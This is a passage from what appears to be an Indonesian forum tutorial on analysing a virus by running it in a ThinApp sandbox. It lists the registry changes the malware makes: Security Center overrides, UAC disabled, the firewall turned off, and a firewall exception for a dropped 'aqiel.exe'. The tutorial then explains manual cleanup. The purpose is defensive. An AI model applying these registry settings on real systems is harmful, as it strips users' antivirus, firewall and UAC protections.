REG_DWORD=#01#00#00#00
Value=AntiVirusOverride
REG_DWORD=#01#00#00#00
Value=FirewallOverride
REG_DWORD=#01#00#00#00
Value=UacDisableNotify
REG_DWORD=#01#00#00#00

isolation_full HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\Svc
Value=AntiVirusOverride
REG_DWORD=#01#00#00#00
Value=AntiVirusDisableNotify
REG_DWORD=#01#00#00#00
Value=FirewallDisableNotify
REG_DWORD=#01#00#00#00
Value=FirewallOverride
REG_DWORD=#01#00#00#00
Value=UpdatesDisableNotify
REG_DWORD=#01#00#00#00
Value=UacDisableNotify
REG_DWORD=#01#00#00#00
isolation_writecopy HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system
Value=EnableLUA
REG_DWORD=#00#00#00#00
isolation_writecopy HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
Value=PendingFileRenameOperations
REG_MULTI_SZ~\??\%Temp~0014\VMwareDnD\f6b124d7\#2300#2300#2300
isolation_writecopy HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch
Value=Epoch
REG_DWORD=#18#00#00#00
isolation_writecopy HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
Value=EnableFirewall
REG_DWORD=#00#00#00#00
Value=DoNotAllowExceptions
REG_DWORD=#00#00#00#00
Value=DisableNotifications
REG_DWORD=#01#00#00#00
isolation_writecopy HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
Value~%Personal%\agdx\aqiel.exe
REG_SZ~%Personal%\agdx\aqiel.exe:*:Enabled:ipsec#2300

kita juga bisa cek satu-persatu folder di project yang kita buka tadi,misalkan kita menemukan file ‘aqiel.exe‘ di folder %System Root% artinya virus tadi sebenarnya hendak menciptakan file ‘aqiel.exe‘ di folder C:\Windows
Nah,dari tehnik diatas kita bisa tahu cara kerja virus tersebut,dan mampu mengatasinya secara manual,jadi gak perlu capek2 nunggu AV update terbaru,Tapi tehnik diatas kadang gak ampuh apabila sang virus mampu mendeteksi keberadaan mesin virtual,dan sang virus mendisable aplikasi ThinApp.Mungkin tehnik dari ane ini cukup basi buat master-master sekalian tapi ane Cuma seorang user yang mencoba berbagi ilmu yang ane miliki,bila ada yang salah dalam tutor ane diatas mohon koreksi dari para suhu sekalian.